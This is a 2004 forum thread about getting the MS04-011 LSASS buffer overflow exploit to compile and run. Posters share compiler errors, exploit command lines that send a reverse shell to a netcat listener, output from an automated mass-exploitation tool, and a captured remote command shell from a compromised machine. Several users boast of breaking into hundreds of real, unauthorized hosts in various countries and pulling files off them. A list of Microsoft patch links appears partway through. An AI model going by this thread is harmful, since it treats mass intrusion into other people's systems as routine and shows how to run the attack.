I am going try to compile it, but i don't think it will work

I will post my errors / reults here.. going to use lcc-win32

great work!
do i have to have Netbios enabled localy to get it working?
tried the scanner and some vulnrable IP's but no shell.

i cannot compile it, it says successfull and i get a 10kb exe file that says "sploit usage:" and futher nothing.. damn i never have luck with these things, this is the 7th time a try to compile an exploit and i always failed, this shit is really hard, u really need to be a programmer to do this

[edit]

second try now, i get this errors:

Wedit output window build: Mon Apr 26 20:30:26 2004
Warning ms04011lsass.c: 96 missing prototype for printf
Warning ms04011lsass.c: 108 missing prototype for sprintf
Warning ms04011lsass.c: 120 missing prototype for printf
Warning ms04011lsass.c: 127 missing prototype for printf
Error ms04011lsass.c: 131 the left hand side of the assignment can't be assigned to
Warning ms04011lsass.c: 134 missing prototype for printf
Warning ms04011lsass.c: 145 missing prototype for htons
Warning ms04011lsass.c: 146 missing prototype for inet_addr
Warning ms04011lsass.c: 156 missing prototype for htons
Warning ms04011lsass.c: 174 missing prototype for printf
Error ms04011lsass.c: 198 type error in argument 1 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Error ms04011lsass.c: 198 type error in argument 2 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Error ms04011lsass.c: 198 type error in argument 3 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Error ms04011lsass.c: 198 type error in argument 4 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Error ms04011lsass.c: 198 type error in argument 5 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Error ms04011lsass.c: 198 type error in argument 6 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Error ms04011lsass.c: 199 type error in argument 7 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Error ms04011lsass.c: 199 type error in argument 8 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Error ms04011lsass.c: 199 type error in argument 9 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Error ms04011lsass.c: 199 type error in argument 10 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Error ms04011lsass.c: 199 type error in argument 11 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Error ms04011lsass.c: 199 type error in argument 12 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Compilation + link time:0.4 sec, Return code: 1

il give up dude

somone else compile it please with the good sbaanetapi.dll

damn that could be a nice one... I will test it here got a couple machines that could work..... thanks

This one rebooted my test machine... no shell

Because u used the version with the incorrect dll (NetAPI32.dll)

it needs to be recompiled with the sbaanetapi.dll from http://www.k-otik.com/exploits/04252004.ms04011lsass.c.php


if someone can do this i would be too nice
i can't wait to test this one... seems to be very good, but no one posted the proper compiled version here, that's too bad guys

the one at the beginning of this thread is compiled with the right dll in the code

damn ur right, it can use it as external dll, damn all that shit for nothing..

I downloaded the one at the beginning of the post....and the dll

maybe its cause machine Im testing it on is winXp en Sp1

exploit works, i have succesfully exploited a box in my country

and it has a nice speed to for the 1st one: Transferred 1 file totaling 13,30 MB in 3,97 (4.790,35 KBps)

patching it right away.......


woei got another 100mbit in my country.. fxping the hotfix right away
Transferred: Windows2000-KB835732-x86-ENU.EXE 6,83 MB in 0,83 (6.992,99 KBps)

and another one

Transferred 1 file totaling 13,30 MB in 1,98 (10.136,73 KBps)

hm..it's really strange.

scanned bout 50 vulnerable hosts with the scanner..but cannot connect to any

never got my shell back

Alexander01
what os version (type lang etc) you hacked with that one.?

cya

all dutch till now.. and im hacking from a 2k server terminal english


[edit]

sorry i mean, located in holland but all have an english 2k server running

can somebody provide a direct link to patch

i scanned port 139 and then put it through the DSS scanner and use the exploit on what the scanner says is vulnerable and get this always:

that's probably because of firewall.

It works great for me, I gain lot of shells but only when exploiting from LAN itself ...

The strange thing is, i tested with a custommer. Ran nc on my workstation and ran the sploit remote. Used an vun ip in his network (not the box i was on) it but the shell i got is the shell from the box you execute the program.

Ok, have tested this out, and although the exploite executes, it doesnt appear to create a shell for me.

here is what I tried:

DSScan.exe to target vun Ip's on my LAN (all Windows 2K SP2)

nc -l -v -p 1234
Listening on [any] 1234 ...


lsass.zip (Original with sbaanetapi.dll)


D:\> lsass 0 172.16.*.* 1234 172.16.*.*
shellcode size 316
Ret value = 1726

Gives the System 60 Second shut down on the taget machine.



nc -l -v -p 1234
Listening on [any] 1234 ...


lsass_fixed.zip (with sbaanetapi.dll)


D:\> lsass 0 172.16.*.* 1234 172.16.*.*
shellcode size 316
Ret value = 1726

Gives the System 60 Second shut down on MY machine.

Well, all I seem to get is this fulla that a few others are getting... I admit, I have only tried two IP's so far though

Create NULL session failed
shellcode size 316
Ret value = 53

Also tested it on a XP pro SP1 Laptop connected to the lan. Also ONLY gives the 60 sec countdown.

anyway, here are all the patches:











Microsoft Windows 2000 Advanced Server SP4:

Microsoft Patch Security Update for Windows 2000 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows 2000 Advanced Server SP3:
Microsoft Patch Security Update for Windows 2000 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows 2000 Advanced Server SP2:
Microsoft Patch Security Update for Windows 2000 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows 2000 Advanced Server SP1:
Microsoft Windows 2000 Advanced Server :
Microsoft Windows 2000 Datacenter Server SP4:
Microsoft Windows 2000 Datacenter Server SP3:
Microsoft Windows 2000 Datacenter Server SP2:
Microsoft Windows 2000 Datacenter Server SP1:
Microsoft Windows 2000 Datacenter Server :
Microsoft Windows 2000 Professional SP4:
Microsoft Patch Security Update for Windows 2000 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows 2000 Professional SP3:
Microsoft Patch Security Update for Windows 2000 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows 2000 Professional SP2:
Microsoft Patch Security Update for Windows 2000 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows 2000 Professional SP1:
Microsoft Windows 2000 Professional :
Microsoft Windows 2000 Server SP4:
Microsoft Patch Security Update for Windows 2000 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows 2000 Server SP3:
Microsoft Patch Security Update for Windows 2000 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows 2000 Server SP2:
Microsoft Patch Security Update for Windows 2000 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows 2000 Server SP1:
Microsoft Windows 2000 Server :
Microsoft Windows Server 2003 Datacenter Edition :
Microsoft Windows Server 2003 Datacenter Edition 64-bit :
Microsoft Windows Server 2003 Enterprise Edition :
Microsoft Patch Security Update for Windows Server 2003 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows Server 2003 Enterprise Edition 64-bit :
Microsoft Patch Security Update for Windows Server 2003 64 Bit Edition and Windows XP 64 Bit Edition Version 2003 (
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows Server 2003 Standard Edition :
Microsoft Patch Security Update for Windows Server 2003 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows Server 2003 Web Edition :
Microsoft Patch Security Update for Windows Server 2003 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows XP 64-bit Edition SP1:
Microsoft Patch Security Update for Windows XP 64 Bit Edition (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows XP 64-bit Edition :
Microsoft Windows XP 64-bit Edition Version 2003 SP1:
Microsoft Patch Security Update for Windows Server 2003 64 Bit Edition and Windows XP 64 Bit Edition Version 2003 (
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows XP 64-bit Edition Version 2003 :
Microsoft Patch Security Update for Windows Server 2003 64 Bit Edition and Windows XP 64 Bit Edition Version 2003 (
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows XP Home SP1:
Microsoft Patch Security Update for Windows XP (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows XP Home :
Microsoft Patch Security Update for Windows XP (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows XP Professional SP1:
Microsoft Patch Security Update for Windows XP (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows XP Professional :
Microsoft Patch Security Update for Windows XP (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en
References
Source: Microsoft Security Bulletin MS04-011
URL: http://www.microsoft.com/technet/security/...n/ms04-011.mspx

Source: Windows Local Security Authority Service Remote Buffer Overflow
URL: http://www.eeye.com/html/Research/Advisori...D20040413C.html

what port this shit works on?

netcat listens to whatever port you tell it to... (and i'm pretty sure it uses 135 for exploit.. netbios)
nc -l -p [port number]

Alexander01
does it really works???

post here the results so eavryone cant see

C:\JAMES>lsass 0 2.2.2.2 112 1.1.1.1
shellcode size 316
Ret value = 1727

C:\JAMES>nc.exe -vlp 112
listening on [any] 112 ...
connect to [1.1.1.1] from crap.fr [2.2.2.2] 1479
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>echo IT'S WORK ON .FR B0XES TOO [WIN2K]
echo IT'S WORK ON .FR B0XES TOO [WIN2K]
IT'S WORK ON .FR B0XES TOO [WIN2K]

C:\WINNT\system32>

read the source --- 139 + 445 are the doors to the window(s)

very nice, thank you

i tested at home WinXp version 2002 service pack 1
Windows XP [version 5.1.2600]
lssas.exe 127.0.0.1 1 996 127.0.0.1 (port open at home 445, only)
it doesn't work

i hacked now over 400 boxes with little bit modded version of this sploit:X
.us .at .cz .ch .se .de .uk roxx

100 scan resaults = ~80 shells;)

cya

Shell never works for me on XP but on 2000 its working real fine. Thanks for all the nfo

Btw are you guys scanning on 139 or 445?

cracken how did you make this possible ? I already found many many shells with sql, dameware, the others rpc vuln, iis but that one... i cant find nothing ... maybe you can give me just one ip that u know working, just for testing that vuln ? give it to me in private msg.


thx

i have the same results like cracken this exploit is real dangerous ..

How this could be
80 shell's from 100 scans. Ich use this scanner from foundstone.com but don't get any shell.
I have WIndows XP maybe thats the reason ?

woaw 8 shgells then i want test this exploit seriously (100 mb line 5 mb line)

Thanks for the toolz

i'm hacking form a windows2000server via remote~ not form my own pc:X
and this exploit is total ownitsch
got 20 tiscalia.ch server 2 of them have 720 gb space that roxx oO

cya

do you use an autohacker ?!?
can please describe wich exploit do you use and wich other files

thx

hm, What did I wrong?
I'm using w2k sp4. I'll try this on xp


+----------------------------------------------------+
ª lsass Auto Hacker ª
ª Coded by $79 ª
+----------------------------------------------------+

Please Select OS [0=W2k 1=XP]
0
Enter Your IP:
x.x.x.x
Port NetCat is Listening on:
123
Starting NetCat:
Create NULL session failed
shellcode size 316
Ret value = 53
Create NULL session failed
shellcode size 316
Ret value = 53
Create NULL session failed
shellcode size 316
Ret value = 53
shellcode size 316
Ret value = 1727
shellcode size 316
Ret value = 1394
Create NULL session failed
shellcode size 316
Ret value = 51
Create NULL session failed
shellcode size 316
Ret value = 53
Create NULL session failed
shellcode size 316
Ret value = 1326
Create NULL session failed
shellcode size 316
Ret value = 53
shellcode size 316
....

i give a (filtered) about you think man..
btw the autohaxxor suxx^^ only n00bs use autohaxxors
Fantafour i wont post ips here i'm not crazy nub

cya

h3h3 yes.
But for big scans autohaxors are very useful.

can someone define which port it is
139 , 445 , or 135?
thanks

HEY GUYZ WHATS UP ANY HOPE FOR THE PERFECT MS04-011 Exploit against XP and 2000,or we should forget this dream?Admins plz guide all of usin making this exploit successfull

@Fantafour maybe ill pm you new src but i wont post it here to much script kidis dont like to lose good ranges at script kidis^^

i scan a big range whit scan.exe port 139 an i have many results than check the ips whit dsscan an now all ips not vuln i found nothing vuln ips

Is that right what i make or wrong


Sorry for bad englisch

Can you help me : I test on win2k server

C:\>lsass.exe 0 1.1.1.1 112 2.2.2.2
shellcode size 316
Ret value = 1727

C:\>nc -l -v -p 112
listening on [any] 112 ...

Waiting but